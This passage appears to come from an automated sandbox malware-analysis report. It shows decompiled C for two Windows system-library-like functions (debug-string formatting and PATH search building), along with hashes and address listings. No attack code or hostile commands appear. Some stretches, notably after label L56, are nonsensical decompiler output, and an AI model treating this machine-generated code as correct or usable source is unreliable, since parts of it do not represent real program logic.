                    • Instruction Fuzzy Hash: E7517771A08301CFC721EF69C09092FFBE5FB98610F15496EEA9587365D770E844CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0146B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                    Download Yara Rule
                    C-Code - Quality: 78%
                    			E0146B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x153f7a8);
				E014BD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E014BD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E014AD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E014AF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L014BDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E014AB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E014AB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E014AE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E014AA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                    0x0146b171
                    0x0146b171
                    0x0146b171
                    0x0146b171
                    0x0146b171
                    0x0146b176
                    0x0146b17b
                    0x0146b180
                    0x0146b186
                    0x0146b18f
                    0x0146b198
                    0x0146b1a4
                    0x0146b1aa
                    0x014c4802
                    0x014c4802
                    0x014c4805
                    0x014c480c
                    0x014c480e
                    0x0146b1d1
                    0x0146b1d3
                    0x0146b1de
                    0x0146b1de
                    0x014c4817
                    0x014c481e
                    0x014c4820
                    0x014c4822
                    0x014c4822
                    0x014c4824
                    0x014c4824
                    0x014c482a
                    0x00000000
                    0x00000000
                    0x014c4835
                    0x014c483a
                    0x014c483d
                    0x014c483f
                    0x014c4842
                    0x014c4842
                    0x014c4842
                    0x014c4846
                    0x014c484c
                    0x014c484e
                    0x014c4851
                    0x014c4851
                    0x014c4853
                    0x014c4854
                    0x014c4854
                    0x014c4858
                    0x014c485a
                    0x014c485a
                    0x014c485d
                    0x014c485f
                    0x014c4861
                    0x014c4861
                    0x014c4866
                    0x014c486b
                    0x014c486e
                    0x014c4871
                    0x014c4876
                    0x014c4876
                    0x014c4878
                    0x014c487b
                    0x014c4884
                    0x014c4884
                    0x00000000
                    0x014c487d
                    0x014c487d
                    0x014c4882
                    0x014c4889
                    0x014c4889
                    0x014c488f
                    0x014c4891
                    0x014c48e0
                    0x014c48e2
                    0x014c48e4
                    0x014c48e4
                    0x014c48e7
                    0x014c48e7
                    0x014c48ed
                    0x014c48f4
                    0x014c48f6
                    0x014c4951
                    0x014c4951
                    0x014c4953
                    0x014c4953
                    0x014c4956
                    0x014c4956
                    0x014c4958
                    0x014c4959
                    0x014c4959
                    0x014c495d
                    0x014c495d
                    0x014c495f
                    0x014c495f
                    0x014c4965
                    0x014c4969
                    0x014c49ba
                    0x014c49ba
                    0x014c49c1
                    0x014c49c5
                    0x014c49cc
                    0x014c49d4
                    0x014c49d7
                    0x014c49da
                    0x014c49e4
                    0x014c49e5
                    0x014c49f3
                    0x014c4a02
                    0x00000000
                    0x014c4a02
                    0x014c4972
                    0x014c4974
                    0x00000000
                    0x00000000
                    0x014c4976
                    0x014c4979
                    0x014c4982
                    0x014c4983
                    0x014c4984
                    0x014c498b
                    0x014c498d
                    0x014c4991
                    0x014c4993
                    0x014c4999
                    0x014c499d
                    0x014c49a2
                    0x014c49a2
                    0x014c49a2
                    0x014c4999
                    0x014c49ac
                    0x00000000
                    0x014c49b3
                    0x014c48f8
                    0x014c48fe
                    0x00000000
                    0x00000000
                    0x00000000
                    0x014c48fe
                    0x014c4895
                    0x014c489c
                    0x014c48ad
                    0x014c48b2
                    0x014c48b5
                    0x014c48b7
                    0x014c48ba
                    0x014c48bc
                    0x014c48c6
                    0x014c48c6
                    0x014c48cb
                    0x014c48d1
                    0x014c48d4
                    0x014c48d8
                    0x014c48d8
                    0x00000000
                    0x014c48d8
                    0x014c48be
                    0x014c48c0
                    0x00000000
                    0x00000000
                    0x014c48c2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x014c48c4
                    0x00000000
                    0x014c4882
                    0x014c487b
                    0x014c4904
                    0x014c4906
                    0x00000000
                    0x00000000
                    0x014c4908
                    0x014c490e
                    0x00000000
                    0x00000000
                    0x014c4910
                    0x014c4917
                    0x014c4917
                    0x00000000
                    0x014c4917
                    0x0146b1ba
                    0x014c47f9
                    0x014c47fc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x014c47fc
                    0x0146b1c0
                    0x0146b1c0
                    0x0146b1c3
                    0x0146b1cb
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: _vswprintf_s
                    • String ID:
                    • API String ID: 677850445-0
                    • Opcode ID: 23cb616648b7574bbd8e4d49a3ea1bf62c60015e8fed89564def254e2cef2f0d
                    • Instruction ID: 27426483c706d9592c9d2fcad3975ea70fb1fe0af72265a4af3556918b4fd4f1
                    • Opcode Fuzzy Hash: 23cb616648b7574bbd8e4d49a3ea1bf62c60015e8fed89564def254e2cef2f0d
                    • Instruction Fuzzy Hash: CF51E479D002698AEB71CF7889547EFBBB0AF10B14F1441AFD859973A1D7704941CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01492581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 84%
                    			E01492581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200389, char _a1546912069) {
				void* _v5;
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t243;
				signed int _t247;
				char* _t248;
				signed int _t252;
				signed int _t254;
				intOrPtr _t256;
				signed int _t259;
				signed int _t266;
				signed int _t269;
				signed int _t277;
				intOrPtr _t283;
				signed int _t285;
				signed int _t287;
				void* _t288;
				void* _t289;
				signed int _t290;
				unsigned int _t293;
				signed int _t297;
				void* _t298;
				void* _t303;
				void* _t304;
				signed int _t306;
				signed int _t310;
				intOrPtr _t322;
				signed int _t331;
				signed int _t333;
				signed int _t334;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t341;
				signed int _t343;
				signed int _t345;
				signed int _t352;
				void* _t353;
				void* _t355;

				_t345 = _t352;
				_t353 = _t352 - 0x4c;
				_v8 =  *0x155d360 ^ _t345;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t338 = 0x155b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t293 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t283 = 0x48;
				_t320 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t331 = 0;
				_v37 = _t320;
				if(_v48 <= 0) {
					L16:
					_t45 = _t283 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t339 = 0xc0000106;
						goto L32;
					} else {
						_t338 = L01484620(_t293,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t283);
						_v52 = _t338;
						__eflags = _t338;
						if(_t338 == 0) {
							_t339 = 0xc0000017;
							goto L32;
						} else {
							 *(_t338 + 0x44) =  *(_t338 + 0x44) & 0x00000000;
							_t50 = _t338 + 0x48; // 0x48
							_t333 = _t50;
							_t320 = _v32;
							 *((intOrPtr*)(_t338 + 0x3c)) = _t283;
							_t285 = 0;
							 *((short*)(_t338 + 0x30)) = _v48;
							__eflags = _t320;
							if(_t320 != 0) {
								 *(_t338 + 0x18) = _t333;
								__eflags = _t320 - 0x1558478;
								 *_t338 = ((0 | _t320 == 0x01558478) - 0x00000001 & 0xfffffffb) + 7;
								E014AF3E0(_t333,  *((intOrPtr*)(_t320 + 4)),  *_t320 & 0x0000ffff);
								_t320 = _v32;
								_t353 = _t353 + 0xc;
								_t285 = 1;
								__eflags = _a8;
								_t333 = _t333 + (( *_t320 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t277 = E014F39F2(_t333);
									_t320 = _v32;
									_t333 = _t277;
								}
							}
							_t297 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t339 = _v68;
								__eflags = 0;
								 *((short*)(_t333 - 2)) = 0;
								goto L32;
							} else {
								_t287 = _t338 + _t285 * 4;
								_v56 = _t287;
								do {
									__eflags = _t320;
									if(_t320 != 0) {
										_t243 =  *(_v60 + _t297 * 4);
										__eflags = _t243;
										if(_t243 == 0) {
											goto L30;
										} else {
											__eflags = _t243 == 5;
											if(_t243 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t287 =  *(_v60 + _t297 * 4);
										 *(_t287 + 0x18) = _t333;
										_t247 =  *(_v60 + _t297 * 4);
										__eflags = _t247 - 8;
										if(_t247 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t247 * 4 +  &M01492959))) {
												case 0:
													__ax =  *0x1558488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E014AF3E0(__edi,  *0x155848c, __ax & 0x0000ffff);
														__eax =  *0x1558488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E014AF3E0(_t333, _v80, _v64);
													_t272 = _v64;
													goto L26;
												case 2:
													 *0x1558480 & 0x0000ffff = E014AF3E0(__edi,  *0x1558484,  *0x1558480 & 0x0000ffff);
													__eax =  *0x1558480 & 0x0000ffff;
													__eax = ( *0x1558480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E014AF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E014AF3E0(_t333, _v76, _v36);
														_t272 = _v36;
													}
													L26:
													_t353 = _t353 + 0xc;
													_t333 = _t333 + (_t272 >> 1) * 2 + 2;
													__eflags = _t333;
													L27:
													_push(0x3b);
													_pop(_t274);
													 *((short*)(_t333 - 2)) = _t274;
													goto L28;
												case 6:
													__ebx =  *0x155575c;
													__eflags = __ebx - 0x155575c;
													if(__ebx != 0x155575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E014AF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x155575c;
														} while (__ebx != 0x155575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1558478 & 0x0000ffff = E014AF3E0(__edi,  *0x155847c,  *0x1558478 & 0x0000ffff);
													__eax =  *0x1558478 & 0x0000ffff;
													__eax = ( *0x1558478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E014F39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1556e58 & 0x0000ffff = E014AF3E0(__edi,  *0x1556e5c,  *0x1556e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1556e58 & 0x0000ffff;
													__eax = ( *0x1556e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t297 = _v16;
													_t320 = _v32;
													L29:
													_t287 = _t287 + 4;
													__eflags = _t287;
													_v56 = _t287;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t297 = _t297 + 1;
									_v16 = _t297;
									__eflags = _t297 - _v48;
								} while (_t297 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t247 =  *(_v60 + _t331 * 4);
						if(_t247 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t247 * 4 +  &M01492935))) {
							case 0:
								__ax =  *0x1558488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t320 =  &_v64;
								_v80 = E01492E3E(0,  &_v64);
								_t283 = _t283 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1558480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1558480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0147EEF0(0x15579a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0147EB70(__ecx, 0x15579a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t221 = _v72;
											__eflags = _t221;
											if(_t221 != 0) {
												L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t221);
											}
											_t222 = _v52;
											__eflags = _t222;
											if(_t222 != 0) {
												__eflags = _t339;
												if(_t339 < 0) {
													L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t222);
													_t222 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t293 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1557b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01484620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0147EB70(__ecx, 0x15579a0);
										__eax = _v52;
										L36:
										_pop(_t332);
										_pop(_t340);
										__eflags = _v8 ^ _t345;
										_pop(_t284);
										return E014AB640(_t222, _t284, _v8 ^ _t345, _t320, _t332, _t340);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t279 = _v56;
								if(_v56 != 0) {
									_t320 =  &_v36;
									_t281 = E01492E3E(_t279,  &_v36);
									_t293 = _v36;
									_v76 = _t281;
								}
								if(_t293 == 0) {
									goto L44;
								} else {
									_t283 = _t283 + 2 + _t293;
								}
								goto L14;
							case 6:
								__eax =  *0x1555764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1558478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1558478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1556e58 & 0x0000ffff;
								__eax = ( *0x1556e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t331 = _t331 + 1;
								if(_t331 >= _v48) {
									goto L16;
								} else {
									_t320 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t298 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					 *((intOrPtr*)(_t338 + 0x28)) =  *((intOrPtr*)(_t338 + 0x28)) + _t353;
					_t248 = _t247 + _t353;
					asm("daa");
					 *_t338 =  *_t338 + _t345;
					 *((intOrPtr*)(_t338 + 0x28)) =  *((intOrPtr*)(_t338 + 0x28)) + _t248;
					_t303 = _t298 - 0xfffffffffffffffd;
					 *0x1f014926 =  *0x1f014926 + _t248;
					_pop(_t288);
					 *((intOrPtr*)(_t248 +  &_a1530200389)) =  *((intOrPtr*)(_t248 +  &_a1530200389)) + _t320;
					 *_t320 =  *_t320 + _t248;
					 *((intOrPtr*)(_t303 + 1)) =  *((intOrPtr*)(_t303 + 1)) - _t303;
					 *_t248 =  *_t248 - 0x49;
					_t341 = _t338 + _t338;
					asm("daa");
					_t304 = _t303 - 1;
					 *_t341 =  *_t341 + _t288;
					 *((intOrPtr*)(_t304 + 1)) =  *((intOrPtr*)(_t304 + 1)) - _t304;
					_t342 = _t341 - 1;
					 *((intOrPtr*)(_t304 + 1)) =  *((intOrPtr*)(_t304 + 1)) - _t304;
					asm("daa");
					_pop(_t289);
					 *((intOrPtr*)(_t248 + _t288 +  &_a1546912069)) =  *((intOrPtr*)(_t248 + _t288 +  &_a1546912069)) + _t341 - 1;
					_t355 = _t353 + _t304 - 1;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x153ff00);
					E014BD08C(_t289, _t333, _t342);
					_v44 =  *[fs:0x18];
					_t334 = 0;
					 *_a24 = 0;
					_t290 = _a12;
					__eflags = _t290;
					if(_t290 == 0) {
						_t252 = 0xc0000100;
					} else {
						_v8 = 0;
						_t343 = 0xc0000100;
						_v52 = 0xc0000100;
						_t254 = 4;
						while(1) {
							_v40 = _t254;
							__eflags = _t254;
							if(_t254 == 0) {
								break;
							}
							_t310 = _t254 * 0xc;
							_v48 = _t310;
							__eflags = _t290 -  *((intOrPtr*)(_t310 + 0x1441664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t269 = E014AE5C0(_a8,  *((intOrPtr*)(_t310 + 0x1441668)), _t290);
									_t355 = _t355 + 0xc;
									__eflags = _t269;
									if(__eflags == 0) {
										_t343 = E014E51BE(_t290,  *((intOrPtr*)(_v48 + 0x144166c)), _a16, _t334, _t343, __eflags, _a20, _a24);
										_v52 = _t343;
										break;
									} else {
										_t254 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t254 = _t254 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t343;
						__eflags = _t343;
						if(_t343 < 0) {
							__eflags = _t343 - 0xc0000100;
							if(_t343 == 0xc0000100) {
								_t306 = _a4;
								__eflags = _t306;
								if(_t306 != 0) {
									_v36 = _t306;
									__eflags =  *_t306 - _t334;
									if( *_t306 == _t334) {
										_t343 = 0xc0000100;
										goto L76;
									} else {
										_t322 =  *((intOrPtr*)(_v44 + 0x30));
										_t256 =  *((intOrPtr*)(_t322 + 0x10));
										__eflags =  *((intOrPtr*)(_t256 + 0x48)) - _t306;
										if( *((intOrPtr*)(_t256 + 0x48)) == _t306) {
											__eflags =  *(_t322 + 0x1c);
											if( *(_t322 + 0x1c) == 0) {
												L106:
												_t343 = E01492AE4( &_v36, _a8, _t290, _a16, _a20, _a24);
												_v32 = _t343;
												__eflags = _t343 - 0xc0000100;
												if(_t343 != 0xc0000100) {
													goto L69;
												} else {
													_t334 = 1;
													_t306 = _v36;
													goto L75;
												}
											} else {
												_t259 = E01476600( *(_t322 + 0x1c));
												__eflags = _t259;
												if(_t259 != 0) {
													goto L106;
												} else {
													_t306 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t343 = E01492C50(_t306, _a8, _t290, _a16, _a20, _a24, _t334);
											L76:
											_v32 = _t343;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0147EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t343 = _a24;
									_t266 = E01492AE4( &_v36, _a8, _t290, _a16, _a20, _t343);
									_v32 = _t266;
									__eflags = _t266 - 0xc0000100;
									if(_t266 == 0xc0000100) {
										_v32 = E01492C50(_v36, _a8, _t290, _a16, _a20, _t343, 1);
									}
									_v8 = _t334;
									E01492ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t252 = _t343;
					}
					L70:
					return E014BD0D1(_t252);
				}
				L108:
			}

























































                    0x01492584
                    0x01492586
                    0x01492590
                    0x01492596
                    0x01492597
                    0x01492598
                    0x01492599
                    0x0149259e
                    0x014925a4
                    0x014925a9
                    0x014925ac
                    0x014925ae
                    0x014925b1
                    0x014925b2
                    0x014925b5
                    0x014925b8
                    0x014925bb
                    0x014925bc
                    0x014925bf
                    0x014925c2
                    0x014925c5
                    0x014925c6
                    0x014925cb
                    0x014925ce
                    0x014925d8
                    0x014925dd
                    0x014925de
                    0x014925e1
                    0x014925e3
                    0x014925e9
                    0x014926da
                    0x014926da
                    0x014926dd
                    0x014926e2
                    0x014d5b56
                    0x00000000
                    0x014926e8
                    0x014926f9
                    0x014926fb
                    0x014926fe
                    0x01492700
                    0x014d5b60
                    0x00000000
                    0x01492706
                    0x01492706
                    0x0149270a
                    0x0149270a
                    0x0149270d
                    0x01492713
                    0x01492716
                    0x01492718
                    0x0149271c
                    0x0149271e
                    0x014d5b6c
                    0x014d5b6f
                    0x014d5b7f
                    0x014d5b89
                    0x014d5b8e
                    0x014d5b93
                    0x014d5b96
                    0x014d5b9c
                    0x014d5ba0
                    0x014d5ba3
                    0x014d5bab
                    0x014d5bb0
                    0x014d5bb3
                    0x014d5bb3
                    0x014d5ba3
                    0x01492724
                    0x01492726
                    0x01492729
                    0x0149272c
                    0x0149279d
                    0x0149279d
                    0x014927a0
                    0x014927a2
                    0x00000000
                    0x0149272e
                    0x0149272e
                    0x01492731
                    0x01492734
                    0x01492734
                    0x01492736
                    0x014d5bc1
                    0x014d5bc1
                    0x014d5bc4
                    0x00000000
                    0x014d5bca
                    0x014d5bca
                    0x014d5bcd
                    0x00000000
                    0x014d5bd3
                    0x00000000
                    0x014d5bd3
                    0x014d5bcd
                    0x0149273c
                    0x0149273c
                    0x01492742
                    0x01492747
                    0x0149274a
                    0x0149274d
                    0x01492750
                    0x00000000
                    0x01492756
                    0x01492756
                    0x00000000
                    0x01492902
                    0x01492908
                    0x0149290b
                    0x00000000
                    0x01492911
                    0x0149291c
                    0x01492921
                    0x00000000
                    0x01492921
                    0x00000000
                    0x00000000
                    0x01492880
                    0x01492887
                    0x0149288c
                    0x00000000
                    0x00000000
                    0x01492805
                    0x0149280a
                    0x01492814
                    0x01492816
                    0x00000000
                    0x00000000
                    0x0149281e
                    0x01492821
                    0x01492823
                    0x00000000
                    0x01492829
                    0x01492829
                    0x01492831
                    0x0149283c
                    0x0149283e
                    0x00000000
